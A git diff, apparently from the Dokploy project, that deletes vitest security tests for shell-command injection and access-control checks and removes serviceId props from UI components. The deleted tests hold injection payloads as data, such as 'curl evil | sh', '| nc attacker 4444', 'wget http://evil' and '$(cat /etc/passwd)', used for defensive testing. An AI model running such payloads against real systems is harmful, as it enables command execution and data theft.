Compare commits

..

1 Commits

Author SHA1 Message Date
Mauricio Siu
cfd600b197 docs: trim block comment on redactServerSshKey 2026-07-19 21:37:46 -06:00
96 changed files with 315 additions and 1374 deletions

View File

@@ -1,106 +0,0 @@
import { execSync } from "node:child_process";
import { chmodSync, existsSync, rmSync, writeFileSync } from "node:fs";
import {
getLibsqlBackupCommand,
getMariadbBackupCommand,
getMongoBackupCommand,
getMysqlBackupCommand,
getPostgresBackupCommand,
} from "@dokploy/server/utils/backups/utils";
import {
getMariadbRestoreCommand,
getMongoRestoreCommand,
getMysqlRestoreCommand,
getPostgresRestoreCommand,
} from "@dokploy/server/utils/restore/utils";
import { afterAll, beforeAll, describe, expect, it } from "vitest";
// A stub replacing the real `docker` binary. It ignores exec/-i/$CONTAINER_ID,
// exports the -e VAR=val pairs, and runs the inner `sh -c <script>` — so the
// test exercises BOTH shell layers (outer /bin/sh building the docker command,
// and the inner shell) the way production does, without needing a container.
const stub = `/tmp/docker_stub_${process.pid}`;
const MARK = `/tmp/dokploy_dbbk_pwned_${process.pid}`;
beforeAll(() => {
writeFileSync(
stub,
`#!/bin/bash
shift # exec
envs=()
while [ "$1" = "-e" ]; do envs+=("$2"); shift 2; done
shift 2 # -i CONTAINER
shell="$1"; shift # bash|sh
shift # -c
env "\${envs[@]}" "$shell" -c "$1" </dev/null 2>/dev/null || true
`,
);
chmodSync(stub, 0o755);
});
afterAll(() => {
if (existsSync(stub)) rmSync(stub);
if (existsSync(MARK)) rmSync(MARK);
});
// Run a builder-produced command with `docker` pointed at the stub; return true
// if no injected command fired.
const runsSafely = (command: string) => {
if (existsSync(MARK)) rmSync(MARK);
const withStub = command.replace(/^docker /, `${stub} `);
try {
execSync(withStub, {
shell: "/bin/bash",
stdio: "ignore",
env: { ...process.env, CONTAINER_ID: "test" },
});
} catch {}
const fired = existsSync(MARK);
if (existsSync(MARK)) rmSync(MARK);
return !fired;
};
// Payloads that try to break out of every quoting style used in the builders.
const p = (mark: string) => [
`$(touch ${mark})`,
"`touch " + mark + "`",
`x'; touch ${mark}; '`,
`x"; touch ${mark}; echo "`,
`x; touch ${mark}`,
];
describe("database backup/restore command injection", () => {
const cases: Array<[string, (v: string) => string]> = [
["postgres backup (database)", (v) => getPostgresBackupCommand(v, "u")],
["postgres backup (user)", (v) => getPostgresBackupCommand("db", v)],
["mariadb backup (password)", (v) => getMariadbBackupCommand("db", "u", v)],
["mysql backup (database)", (v) => getMysqlBackupCommand(v, "pw")],
["mongo backup (user)", (v) => getMongoBackupCommand("db", v, "pw")],
["libsql backup (database)", (v) => getLibsqlBackupCommand(v)],
["postgres restore (database)", (v) => getPostgresRestoreCommand(v, "u")],
[
"mariadb restore (password)",
(v) => getMariadbRestoreCommand("db", "u", v),
],
["mysql restore (database)", (v) => getMysqlRestoreCommand(v, "pw")],
["mongo restore (user)", (v) => getMongoRestoreCommand("db", v, "pw")],
];
for (const [label, build] of cases) {
it(`${label} is not injectable`, () => {
for (const payload of p(MARK)) {
expect(runsSafely(build(payload))).toBe(true);
}
});
}
it("preserves a legitimate database name (passed through as env var)", () => {
const cmd = getPostgresBackupCommand("my-db_prod", "app_user");
// Values live in -e assignments, never inline in the pg_dump text.
expect(cmd).toContain("-e DB_NAME=my-db_prod");
expect(cmd).toContain("-e DB_USER=app_user");
expect(cmd).toContain(
'pg_dump -Fc --no-acl --no-owner -h localhost -U "$DB_USER"',
);
});
});

View File

@@ -1,70 +0,0 @@
import { execSync } from "node:child_process";
import { existsSync, rmSync } from "node:fs";
import { getRegistryTag } from "@dokploy/server/utils/cluster/upload";
import { parse, quote } from "shell-quote";
import { describe, expect, it } from "vitest";
const MARK = `/tmp/dokploy_regnode_pwned_${process.pid}`;
const runsSafely = (command: string) => {
if (existsSync(MARK)) rmSync(MARK);
try {
execSync(command, { shell: "/bin/sh", stdio: "ignore" });
} catch {}
const fired = existsSync(MARK);
if (existsSync(MARK)) rmSync(MARK);
return !fired;
};
const PAYLOADS = (m: string) => [
`$(touch ${m})`,
"`touch " + m + "`",
`x; touch ${m}`,
`x | touch ${m}`,
];
describe("cluster removeWorker nodeId injection", () => {
// docker node update/rm ${quote([nodeId])} — replace `docker node` with `:`.
it("escapes nodeId in drain/remove commands", () => {
for (const nodeId of PAYLOADS(MARK)) {
const drain = `: node update --availability drain ${quote([nodeId])}`;
const remove = `: node rm ${quote([nodeId])} --force`;
expect(runsSafely(drain)).toBe(true);
expect(runsSafely(remove)).toBe(true);
}
});
});
describe("swarm upload registry tag/push injection", () => {
// registryTag is built from registryUrl/username/imagePrefix (username and
// imagePrefix have no schema regex). Assert docker tag/push stay safe.
it("escapes a malicious imagePrefix flowing into the registry tag", () => {
for (const payload of PAYLOADS(MARK)) {
const registryTag = getRegistryTag(
{
registryUrl: "registry.example.com",
imagePrefix: payload,
username: "user",
} as any,
"app:latest",
);
const tagCmd = `: tag ${quote(["app:latest"])} ${quote([registryTag])}`;
const pushCmd = `: push ${quote([registryTag])}`;
expect(runsSafely(tagCmd)).toBe(true);
expect(runsSafely(pushCmd)).toBe(true);
}
});
it("keeps a legitimate registry tag intact", () => {
const tag = getRegistryTag(
{
registryUrl: "registry.example.com",
imagePrefix: "team",
username: "user",
} as any,
"myapp:1.2.3",
);
expect(tag).toBe("registry.example.com/team/myapp:1.2.3");
expect(parse(quote([tag]))).toEqual([tag]);
});
});

View File

@@ -1,104 +0,0 @@
import { execSync } from "node:child_process";
import { existsSync, rmSync } from "node:fs";
import { createCommand } from "@dokploy/server/utils/builders/compose";
import { parse, quote } from "shell-quote";
import { describe, expect, it } from "vitest";
const MARK = `/tmp/dokploy_compose_pwned_${process.pid}`;
const base = {
composeType: "docker-compose" as const,
appName: "compose-app",
sourceType: "raw" as const,
command: "",
composePath: "docker-compose.yml",
};
// createCommand output is interpolated as `docker ${command}` at the deploy
// sink; run `: ${command}` (docker -> no-op) and assert no injection fires.
const runsSafely = (command: string) => {
if (existsSync(MARK)) rmSync(MARK);
try {
execSync(`: ${command}`, { shell: "/bin/sh", stdio: "ignore" });
} catch {}
const fired = existsSync(MARK);
if (existsSync(MARK)) rmSync(MARK);
return !fired;
};
const PAYLOADS = [
`$(touch ${MARK})`,
"`touch " + MARK + "`",
`x; touch ${MARK}`,
`x | touch ${MARK}`,
];
describe("compose createCommand injection", () => {
it("escapes composePath (docker-compose)", () => {
for (const p of PAYLOADS) {
const cmd = createCommand({
...base,
sourceType: "github",
composePath: p,
} as any);
expect(runsSafely(cmd)).toBe(true);
}
});
it("escapes composePath (stack deploy)", () => {
for (const p of PAYLOADS) {
const cmd = createCommand({
...base,
composeType: "stack",
sourceType: "github",
composePath: p,
} as any);
expect(runsSafely(cmd)).toBe(true);
}
});
it("escapes appName", () => {
for (const p of PAYLOADS) {
const cmd = createCommand({
...base,
sourceType: "github",
appName: p,
composePath: "docker-compose.yml",
} as any);
expect(runsSafely(cmd)).toBe(true);
}
});
it("rejects a custom command containing shell control characters", () => {
for (const bad of [
"up -d; rm -rf /",
"up && curl evil | sh",
"up $(touch x)",
"up `id`",
]) {
expect(() => createCommand({ ...base, command: bad } as any)).toThrow(
/Invalid characters/,
);
}
});
it("allows a legitimate custom command", () => {
const cmd = createCommand({
...base,
command: "compose -f docker-compose.yml -p app up -d --build",
} as any);
expect(cmd).toBe("compose -f docker-compose.yml -p app up -d --build");
});
it("keeps a legitimate composePath intact", () => {
const cmd = createCommand({
...base,
sourceType: "github",
composePath: "deploy/docker-compose.prod.yml",
} as any);
expect(parse(cmd)).toContain("deploy/docker-compose.prod.yml");
expect(quote(["deploy/docker-compose.prod.yml"])).toBe(
"deploy/docker-compose.prod.yml",
);
});
});

View File

@@ -1,41 +0,0 @@
import { execSync } from "node:child_process";
import { existsSync, rmSync } from "node:fs";
import { parse, quote } from "shell-quote";
import { describe, expect, it } from "vitest";
// The six database deploy functions (postgres/mysql/mariadb/mongo/redis/libsql)
// build `docker pull ${quote([dockerImage])}` for the remote (execAsyncRemote)
// path. `docker` is replaced by `:` so only the injection surface is exercised.
const MARK = `/tmp/dokploy_dbimg_pwned_${process.pid}`;
const PAYLOADS = [
"$(touch %MARK%)",
"`touch %MARK%`",
"redis:7; touch %MARK%",
"redis:7 && touch %MARK%",
"redis:7 | touch %MARK%",
];
describe("database service dockerImage command injection", () => {
it("does not execute injected commands from dockerImage", () => {
for (const template of PAYLOADS) {
if (existsSync(MARK)) rmSync(MARK);
const dockerImage = template.replace("%MARK%", MARK);
const command = `: pull ${quote([dockerImage])}`;
try {
execSync(command, { shell: "/bin/sh", stdio: "ignore" });
} catch {}
expect(existsSync(MARK)).toBe(false);
}
if (existsSync(MARK)) rmSync(MARK);
});
it("keeps a legitimate image tag intact", () => {
expect(parse(quote(["postgres:16.4-alpine"]))).toEqual([
"postgres:16.4-alpine",
]);
expect(parse(quote(["ghcr.io/org/db:latest"]))).toEqual([
"ghcr.io/org/db:latest",
]);
});
});

View File

@@ -1,66 +0,0 @@
import { execSync } from "node:child_process";
import { existsSync, rmSync } from "node:fs";
import { parse, quote } from "shell-quote";
import { describe, expect, it } from "vitest";
// Reproduces the escaping applied at the docker build/pull sinks and asserts no
// payload can break out of the command. `docker`/`cd` are replaced by `:` so the
// test exercises only the injection surface, not real docker.
const MARK = `/tmp/dokploy_docker_pwned_${process.pid}`;
const runAndCheckSafe = (command: string) => {
if (existsSync(MARK)) rmSync(MARK);
try {
execSync(command, { shell: "/bin/sh", stdio: "ignore" });
} catch {
// no-op stand-ins may exit non-zero; only the marker matters.
}
const fired = existsSync(MARK);
if (existsSync(MARK)) rmSync(MARK);
return !fired;
};
const PAYLOADS = [
"$(touch %MARK%)",
"`touch %MARK%`",
"x; touch %MARK%",
"x && touch %MARK%",
"x | touch %MARK%",
];
describe("docker build/pull command injection", () => {
it("dockerImage (buildRemoteDocker: docker pull / echo) is escaped", () => {
for (const p of PAYLOADS) {
const dockerImage = p.replace("%MARK%", MARK);
const command = `: pull ${quote([dockerImage])}; : echo ${quote([`Pulling ${dockerImage}`])}`;
expect(runAndCheckSafe(command)).toBe(true);
}
});
it("dockerContextPath (docker-file: cd) is escaped", () => {
for (const p of PAYLOADS) {
const dockerContextPath = p.replace("%MARK%", MARK);
const command = `: cd ${quote([dockerContextPath])}`;
expect(runAndCheckSafe(command)).toBe(true);
}
});
it("publishDirectory (nixpacks: docker cp source path) is escaped", () => {
for (const p of PAYLOADS) {
const publishDirectory = p.replace("%MARK%", MARK);
const containerId = "buildabc";
const command = `: cp ${quote([`${containerId}:/app/${publishDirectory}/.`])} /dest`;
expect(runAndCheckSafe(command)).toBe(true);
}
});
it("keeps a legitimate image / path intact as a single token", () => {
// Escaping may add backslashes (e.g. before ':'), but the shell must parse
// the result back to exactly the original single token.
expect(parse(quote(["nginx:1.27-alpine"]))).toEqual(["nginx:1.27-alpine"]);
expect(parse(quote(["registry.io/team/app:tag"]))).toEqual([
"registry.io/team/app:tag",
]);
expect(parse(quote(["dist/static"]))).toEqual(["dist/static"]);
});
});

View File

@@ -1,89 +0,0 @@
import { cloneGitRepository } from "@dokploy/server/utils/providers/git";
import { parse, quote } from "shell-quote";
import { describe, expect, it } from "vitest";
// How git-provider commands escape a single user value before it reaches the shell.
const shellArg = (value: string) => quote([String(value ?? "")]);
// Payloads that, if reached a shell unescaped, would execute commands.
const INJECTION_PAYLOADS = [
"$(touch /tmp/pwned)",
"`id`",
"; rm -rf /",
"&& curl evil.sh | sh",
"| nc attacker 4444",
"https://github.com/o/r.git$(whoami)",
"main; wget http://evil",
"$(cat /etc/passwd)",
];
// Legit values that must survive escaping unchanged.
const LEGIT_VALUES = [
"main",
"feature/login-v2",
"release-1.2.3",
"https://github.com/dokploy/dokploy.git",
"https://gitlab.example.com/group/sub/project.git",
];
describe("git provider shell escaping (quote)", () => {
it("collapses every injection payload into a single literal token (no shell operators)", () => {
for (const payload of INJECTION_PAYLOADS) {
const parsed = parse(shellArg(payload));
// A safely escaped value parses back to exactly the original string,
// as ONE token. If escaping failed, parse() would emit operator
// objects such as { op: ";" } or { op: "$(" } instead.
expect(parsed).toEqual([payload]);
}
});
it("leaves legitimate URLs and branch names intact", () => {
for (const value of LEGIT_VALUES) {
expect(parse(shellArg(value))).toEqual([value]);
}
});
});
describe("cloneGitRepository command (customGitUrl path)", () => {
const buildClone = (customGitUrl: string, customGitBranch: string) =>
cloneGitRepository({
appName: "demo-app",
customGitUrl,
customGitBranch,
customGitSSHKeyId: null,
enableSubmodules: false,
serverId: null,
type: "application",
});
// A malicious substring, once escaped, must survive parsing as inert literal
// text and never as an executable command/operator. `parse()` turns command
// substitution and control operators into { op } objects, so we assert the
// injected marker only ever shows up inside a plain string token.
const markerLeaksAsShellSyntax = (command: string, marker: string) => {
const tokens = parse(command);
return tokens.some(
(t) => typeof t !== "string" && JSON.stringify(t).includes(marker),
);
};
it("does not let a malicious customGitUrl inject shell operators", async () => {
const command = await buildClone(
"https://github.com/o/r.git$(touch /tmp/pwned)",
"main",
);
expect(markerLeaksAsShellSyntax(command, "touch")).toBe(false);
expect(command).toContain("git clone");
});
it("does not let a malicious customGitBranch inject shell operators", async () => {
const command = await buildClone(
"https://github.com/o/r.git",
"main; touch /tmp/pwned",
);
// The branch is a single quoted token, so its ";" contributes no extra
// operator and `touch` never becomes a runnable statement.
expect(markerLeaksAsShellSyntax(command, "touch")).toBe(false);
expect(command).not.toContain("touch /tmp/pwned;");
});
});

View File

@@ -1,91 +0,0 @@
import { TRPCError } from "@trpc/server";
import { beforeEach, describe, expect, it, vi } from "vitest";
// Mock the DB so the REAL getAccessibleGitProviderIds (called internally by
// assertGitProviderAccess) runs against controlled data. Mocking the exported
// function would NOT intercept the intra-module call, so we mock one layer down.
const mockDb = vi.hoisted(() => ({
query: {
gitProvider: {
findMany: vi.fn(),
},
member: {
findFirst: vi.fn(),
},
},
}));
vi.mock("@dokploy/server/db", () => ({ db: mockDb }));
const mockHasValidLicense = vi.hoisted(() => vi.fn());
vi.mock("@dokploy/server/services/proprietary/license-key", () => ({
hasValidLicense: mockHasValidLicense,
}));
import { assertGitProviderAccess } from "@dokploy/server/services/git-provider";
const ORG = "org-1";
const USER = "user-member";
const session = { userId: USER, activeOrganizationId: ORG };
// Provider owned by USER within ORG -> should be accessible.
const providerMine = {
gitProviderId: "gp-mine",
userId: USER,
sharedWithOrganization: false,
};
// Provider owned by someone else within ORG, not shared, not assigned.
const providerOther = {
gitProviderId: "gp-other",
userId: "user-2",
sharedWithOrganization: false,
};
beforeEach(() => {
vi.clearAllMocks();
mockHasValidLicense.mockResolvedValue(false);
mockDb.query.gitProvider.findMany.mockResolvedValue([
providerMine,
providerOther,
]);
mockDb.query.member.findFirst.mockResolvedValue({
role: "member",
accessedGitProviders: [],
});
});
describe("assertGitProviderAccess (git provider IDOR guard)", () => {
it("rejects a provider from another organization with NOT_FOUND (cross-org IDOR)", async () => {
await expect(
assertGitProviderAccess(session, {
gitProviderId: "gp-mine",
organizationId: "org-2",
}),
).rejects.toMatchObject({ code: "NOT_FOUND" });
});
it("rejects a same-org provider the caller is not entitled to with FORBIDDEN", async () => {
await expect(
assertGitProviderAccess(session, {
gitProviderId: "gp-other",
organizationId: ORG,
}),
).rejects.toMatchObject({ code: "FORBIDDEN" });
});
it("allows a same-org provider the caller owns", async () => {
await expect(
assertGitProviderAccess(session, {
gitProviderId: "gp-mine",
organizationId: ORG,
}),
).resolves.toBeUndefined();
});
it("throws a TRPCError so tRPC maps the HTTP status", async () => {
const err = await assertGitProviderAccess(session, {
gitProviderId: "gp-mine",
organizationId: "org-2",
}).catch((e) => e);
expect(err).toBeInstanceOf(TRPCError);
});
});

View File

@@ -1,41 +0,0 @@
import { execSync } from "node:child_process";
import { existsSync, rmSync } from "node:fs";
import { quote } from "shell-quote";
import { describe, expect, it } from "vitest";
// Mirrors how getNodeInfo builds its command in services/docker.ts:
// `docker node inspect ${quote([nodeId])} --format '{{json .}}'`
// We swap `docker node inspect` for `:` (a no-op) so the test only exercises
// whether the nodeId payload can break out of the command, not real docker.
const buildCommand = (nodeId: string) =>
`: node inspect ${quote([nodeId])} --format '{{json .}}'`;
const INJECTION_NODE_IDS = [
"$(touch %MARK%)",
"`touch %MARK%`",
"; touch %MARK%",
"abc | touch %MARK%",
"&& touch %MARK%",
];
describe("getNodeInfo nodeId command injection", () => {
it("does not execute injected commands from the nodeId", () => {
const mark = `/tmp/dokploy_swarm_pwned_${process.pid}`;
for (const template of INJECTION_NODE_IDS) {
if (existsSync(mark)) rmSync(mark);
const nodeId = template.replace("%MARK%", mark);
try {
execSync(buildCommand(nodeId), { shell: "/bin/sh", stdio: "ignore" });
} catch {
// A non-zero exit from the no-op is fine; we only care about the marker.
}
expect(existsSync(mark)).toBe(false);
}
if (existsSync(mark)) rmSync(mark);
});
it("keeps a legitimate node id intact as a single literal token", () => {
const nodeId = "abc123def456";
expect(quote([nodeId])).toBe(nodeId);
});
});

View File

@@ -1,104 +0,0 @@
import { beforeEach, describe, expect, it, vi } from "vitest";
// Mock the permission + server helpers the wss authorizer composes.
const mockHasPermission = vi.hoisted(() => vi.fn());
const mockFindMember = vi.hoisted(() => vi.fn());
const mockCheckServiceAccess = vi.hoisted(() => vi.fn());
vi.mock("@dokploy/server/services/permission", () => ({
hasPermission: mockHasPermission,
findMemberByUserId: mockFindMember,
checkServiceAccess: mockCheckServiceAccess,
}));
const mockGetAccessibleServerIds = vi.hoisted(() => vi.fn());
vi.mock("@dokploy/server", () => ({
getAccessibleServerIds: mockGetAccessibleServerIds,
}));
import {
canAccessDockerOverWss,
canAccessTerminalOverWss,
} from "@/server/wss/authorize";
const USER = { id: "user-1" };
const SESSION = { activeOrganizationId: "org-1" };
beforeEach(() => {
vi.clearAllMocks();
});
describe("canAccessDockerOverWss", () => {
it("denies when there is no user or session", async () => {
expect(await canAccessDockerOverWss(null, SESSION)).toBe(false);
expect(await canAccessDockerOverWss(USER, null)).toBe(false);
});
it("denies a member without docker permission", async () => {
mockHasPermission.mockResolvedValue(false);
expect(await canAccessDockerOverWss(USER, SESSION)).toBe(false);
});
it("allows when the caller has docker permission (no server)", async () => {
mockHasPermission.mockResolvedValue(true);
expect(await canAccessDockerOverWss(USER, SESSION)).toBe(true);
});
it("denies a remote server the caller cannot access, even with docker permission", async () => {
mockHasPermission.mockResolvedValue(true);
mockGetAccessibleServerIds.mockResolvedValue(new Set(["other-server"]));
expect(await canAccessDockerOverWss(USER, SESSION, "srv-1")).toBe(false);
});
it("allows a remote server the caller can access", async () => {
mockHasPermission.mockResolvedValue(true);
mockGetAccessibleServerIds.mockResolvedValue(new Set(["srv-1"]));
expect(await canAccessDockerOverWss(USER, SESSION, "srv-1")).toBe(true);
});
it("denies when the container belongs to a service the caller cannot access", async () => {
mockCheckServiceAccess.mockRejectedValue(new Error("no access"));
expect(await canAccessDockerOverWss(USER, SESSION, null, "svc-1")).toBe(
false,
);
});
it("allows service access even without docker permission or server access", async () => {
// A member granted the service but without canAccessToDocker, whose
// service runs on a server they were not individually granted, must still
// read its logs — matches application.readLogs (service access only).
mockHasPermission.mockResolvedValue(false);
mockGetAccessibleServerIds.mockResolvedValue(new Set());
mockCheckServiceAccess.mockResolvedValue(undefined);
expect(
await canAccessDockerOverWss(USER, SESSION, "srv-remote", "svc-1"),
).toBe(true);
// Service path is authoritative — it must not fall through to docker/server.
expect(mockHasPermission).not.toHaveBeenCalled();
expect(mockGetAccessibleServerIds).not.toHaveBeenCalled();
});
});
describe("canAccessTerminalOverWss", () => {
it("denies the local host terminal to a plain member", async () => {
mockFindMember.mockResolvedValue({ role: "member" });
expect(await canAccessTerminalOverWss(USER, SESSION, "local")).toBe(false);
});
it("allows the local host terminal to an owner", async () => {
mockFindMember.mockResolvedValue({ role: "owner" });
expect(await canAccessTerminalOverWss(USER, SESSION, "local")).toBe(true);
});
it("allows the local host terminal to an admin", async () => {
mockFindMember.mockResolvedValue({ role: "admin" });
expect(await canAccessTerminalOverWss(USER, SESSION, "local")).toBe(true);
});
it("gates a remote server terminal on server access", async () => {
mockGetAccessibleServerIds.mockResolvedValue(new Set(["srv-1"]));
expect(await canAccessTerminalOverWss(USER, SESSION, "srv-1")).toBe(true);
expect(await canAccessTerminalOverWss(USER, SESSION, "srv-2")).toBe(false);
// role lookup must not be needed for the remote path
expect(mockFindMember).not.toHaveBeenCalled();
});
});

View File

@@ -271,7 +271,6 @@ export const ShowGeneralApplication = ({ applicationId }: Props) => {
<DockerTerminalModal <DockerTerminalModal
appName={data?.appName || ""} appName={data?.appName || ""}
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
serviceId={applicationId}
> >
<Button <Button
variant="outline" variant="outline"

View File

@@ -50,10 +50,9 @@ export const badgeStateColor = (state: string) => {
interface Props { interface Props {
appName: string; appName: string;
serverId?: string; serverId?: string;
serviceId?: string;
} }
export const ShowDockerLogs = ({ appName, serverId, serviceId }: Props) => { export const ShowDockerLogs = ({ appName, serverId }: Props) => {
const [containerId, setContainerId] = useState<string | undefined>(); const [containerId, setContainerId] = useState<string | undefined>();
const [option, setOption] = useState<"swarm" | "native">("native"); const [option, setOption] = useState<"swarm" | "native">("native");
@@ -183,7 +182,6 @@ export const ShowDockerLogs = ({ appName, serverId, serviceId }: Props) => {
serverId={serverId || ""} serverId={serverId || ""}
containerId={containerId || "select-a-container"} containerId={containerId || "select-a-container"}
runType={option} runType={option}
serviceId={serviceId}
/> />
</CardContent> </CardContent>
</Card> </Card>

View File

@@ -55,14 +55,12 @@ interface Props {
appName: string; appName: string;
serverId?: string; serverId?: string;
appType: "stack" | "docker-compose"; appType: "stack" | "docker-compose";
serviceId?: string;
} }
export const ShowComposeContainers = ({ export const ShowComposeContainers = ({
appName, appName,
appType, appType,
serverId, serverId,
serviceId,
}: Props) => { }: Props) => {
const { data, isPending, refetch } = const { data, isPending, refetch } =
api.docker.getContainersByAppNameMatch.useQuery( api.docker.getContainersByAppNameMatch.useQuery(
@@ -124,7 +122,6 @@ export const ShowComposeContainers = ({
key={container.containerId} key={container.containerId}
container={container} container={container}
serverId={serverId} serverId={serverId}
serviceId={serviceId}
onActionComplete={() => refetch()} onActionComplete={() => refetch()}
/> />
))} ))}
@@ -145,14 +142,12 @@ interface ContainerRowProps {
status: string; status: string;
}; };
serverId?: string; serverId?: string;
serviceId?: string;
onActionComplete: () => void; onActionComplete: () => void;
} }
const ContainerRow = ({ const ContainerRow = ({
container, container,
serverId, serverId,
serviceId,
onActionComplete, onActionComplete,
}: ContainerRowProps) => { }: ContainerRowProps) => {
const [logsOpen, setLogsOpen] = useState(false); const [logsOpen, setLogsOpen] = useState(false);
@@ -241,7 +236,6 @@ const ContainerRow = ({
<DockerTerminalModal <DockerTerminalModal
containerId={container.containerId} containerId={container.containerId}
serverId={serverId || ""} serverId={serverId || ""}
serviceId={serviceId}
> >
Terminal Terminal
</DockerTerminalModal> </DockerTerminalModal>
@@ -286,7 +280,6 @@ const ContainerRow = ({
containerId={container.containerId} containerId={container.containerId}
serverId={serverId} serverId={serverId}
runType="native" runType="native"
serviceId={serviceId}
/> />
</div> </div>
</DialogContent> </DialogContent>

View File

@@ -206,7 +206,6 @@ export const ComposeActions = ({ composeId }: Props) => {
appName={data?.appName || ""} appName={data?.appName || ""}
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
appType={data?.composeType || "docker-compose"} appType={data?.composeType || "docker-compose"}
serviceId={data?.composeId}
> >
<Button <Button
variant="outline" variant="outline"

View File

@@ -35,14 +35,9 @@ export const DockerLogs = dynamic(
interface Props { interface Props {
appName: string; appName: string;
serverId?: string; serverId?: string;
serviceId?: string;
} }
export const ShowDockerLogsStack = ({ export const ShowDockerLogsStack = ({ appName, serverId }: Props) => {
appName,
serverId,
serviceId,
}: Props) => {
const [option, setOption] = useState<"swarm" | "native">("native"); const [option, setOption] = useState<"swarm" | "native">("native");
const [containerId, setContainerId] = useState<string | undefined>(); const [containerId, setContainerId] = useState<string | undefined>();
@@ -172,7 +167,6 @@ export const ShowDockerLogsStack = ({
serverId={serverId || ""} serverId={serverId || ""}
containerId={containerId || "select-a-container"} containerId={containerId || "select-a-container"}
runType={option} runType={option}
serviceId={serviceId}
/> />
</CardContent> </CardContent>
</Card> </Card>

View File

@@ -35,14 +35,12 @@ interface Props {
appName: string; appName: string;
serverId?: string; serverId?: string;
appType: "stack" | "docker-compose"; appType: "stack" | "docker-compose";
serviceId?: string;
} }
export const ShowDockerLogsCompose = ({ export const ShowDockerLogsCompose = ({
appName, appName,
appType, appType,
serverId, serverId,
serviceId,
}: Props) => { }: Props) => {
const { data, isPending } = api.docker.getContainersByAppNameMatch.useQuery( const { data, isPending } = api.docker.getContainersByAppNameMatch.useQuery(
{ {
@@ -106,7 +104,6 @@ export const ShowDockerLogsCompose = ({
serverId={serverId || ""} serverId={serverId || ""}
containerId={containerId || "select-a-container"} containerId={containerId || "select-a-container"}
runType="native" runType="native"
serviceId={serviceId}
/> />
</CardContent> </CardContent>
</Card> </Card>

View File

@@ -23,7 +23,6 @@ interface Props {
containerId: string; containerId: string;
serverId?: string | null; serverId?: string | null;
runType: "swarm" | "native"; runType: "swarm" | "native";
serviceId?: string;
} }
export const priorities = [ export const priorities = [
@@ -53,7 +52,6 @@ export const DockerLogsId: React.FC<Props> = ({
containerId, containerId,
serverId, serverId,
runType, runType,
serviceId,
}) => { }) => {
const { data } = api.docker.getConfig.useQuery( const { data } = api.docker.getConfig.useQuery(
{ {
@@ -159,10 +157,6 @@ export const DockerLogsId: React.FC<Props> = ({
params.append("serverId", serverId); params.append("serverId", serverId);
} }
if (serviceId) {
params.append("serviceId", serviceId);
}
const wsUrl = `${protocol}//${ const wsUrl = `${protocol}//${
window.location.host window.location.host
}/docker-container-logs?${params.toString()}`; }/docker-container-logs?${params.toString()}`;
@@ -228,7 +222,7 @@ export const DockerLogsId: React.FC<Props> = ({
ws.close(); ws.close();
} }
}; };
}, [containerId, serverId, serviceId, lines, search, since]); }, [containerId, serverId, lines, search, since]);
const handleDownload = () => { const handleDownload = () => {
const logContent = filteredLogs const logContent = filteredLogs

View File

@@ -23,14 +23,12 @@ interface Props {
containerId: string; containerId: string;
serverId?: string; serverId?: string;
children?: React.ReactNode; children?: React.ReactNode;
serviceId?: string;
} }
export const DockerTerminalModal = ({ export const DockerTerminalModal = ({
children, children,
containerId, containerId,
serverId, serverId,
serviceId,
}: Props) => { }: Props) => {
const [mainDialogOpen, setMainDialogOpen] = useState(false); const [mainDialogOpen, setMainDialogOpen] = useState(false);
const [confirmDialogOpen, setConfirmDialogOpen] = useState(false); const [confirmDialogOpen, setConfirmDialogOpen] = useState(false);
@@ -76,7 +74,6 @@ export const DockerTerminalModal = ({
id="terminal" id="terminal"
containerId={containerId} containerId={containerId}
serverId={serverId || ""} serverId={serverId || ""}
serviceId={serviceId}
/> />
<Dialog open={confirmDialogOpen} onOpenChange={setConfirmDialogOpen}> <Dialog open={confirmDialogOpen} onOpenChange={setConfirmDialogOpen}>
<DialogContent onEscapeKeyDown={(event) => event.preventDefault()}> <DialogContent onEscapeKeyDown={(event) => event.preventDefault()}>

View File

@@ -10,14 +10,12 @@ interface Props {
id: string; id: string;
containerId?: string; containerId?: string;
serverId?: string; serverId?: string;
serviceId?: string;
} }
export const DockerTerminal: React.FC<Props> = ({ export const DockerTerminal: React.FC<Props> = ({
id, id,
containerId, containerId,
serverId, serverId,
serviceId,
}) => { }) => {
const termRef = useRef(null); const termRef = useRef(null);
const [activeWay, setActiveWay] = React.useState<string | undefined>("bash"); const [activeWay, setActiveWay] = React.useState<string | undefined>("bash");
@@ -40,7 +38,7 @@ export const DockerTerminal: React.FC<Props> = ({
const addonFit = new FitAddon(); const addonFit = new FitAddon();
const protocol = window.location.protocol === "https:" ? "wss:" : "ws:"; const protocol = window.location.protocol === "https:" ? "wss:" : "ws:";
const wsUrl = `${protocol}//${window.location.host}/docker-container-terminal?containerId=${containerId}&activeWay=${activeWay}${serverId ? `&serverId=${serverId}` : ""}${serviceId ? `&serviceId=${serviceId}` : ""}`; const wsUrl = `${protocol}//${window.location.host}/docker-container-terminal?containerId=${containerId}&activeWay=${activeWay}${serverId ? `&serverId=${serverId}` : ""}`;
const ws = new WebSocket(wsUrl); const ws = new WebSocket(wsUrl);

View File

@@ -229,7 +229,6 @@ export const ShowGeneralLibsql = ({ libsqlId }: Props) => {
)} )}
<DockerTerminalModal <DockerTerminalModal
appName={data?.appName || ""} appName={data?.appName || ""}
serviceId={data?.libsqlId}
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
> >
<Button <Button

View File

@@ -236,7 +236,6 @@ export const ShowGeneralMariadb = ({ mariadbId }: Props) => {
))} ))}
<DockerTerminalModal <DockerTerminalModal
appName={data?.appName || ""} appName={data?.appName || ""}
serviceId={data?.mariadbId}
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
> >
<Button <Button

View File

@@ -230,7 +230,6 @@ export const ShowGeneralMongo = ({ mongoId }: Props) => {
</TooltipProvider> </TooltipProvider>
<DockerTerminalModal <DockerTerminalModal
appName={data?.appName || ""} appName={data?.appName || ""}
serviceId={data?.mongoId}
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
> >
<Button <Button

View File

@@ -228,7 +228,6 @@ export const ShowGeneralMysql = ({ mysqlId }: Props) => {
</TooltipProvider> </TooltipProvider>
<DockerTerminalModal <DockerTerminalModal
appName={data?.appName || ""} appName={data?.appName || ""}
serviceId={data?.mysqlId}
serverId={data?.serverId || ""} serverId={data?.serverId || ""}
> >
<Button <Button

View File

@@ -234,7 +234,6 @@ export const ShowGeneralPostgres = ({ postgresId }: Props) => {
</TooltipProvider> </TooltipProvider>
<DockerTerminalModal <DockerTerminalModal
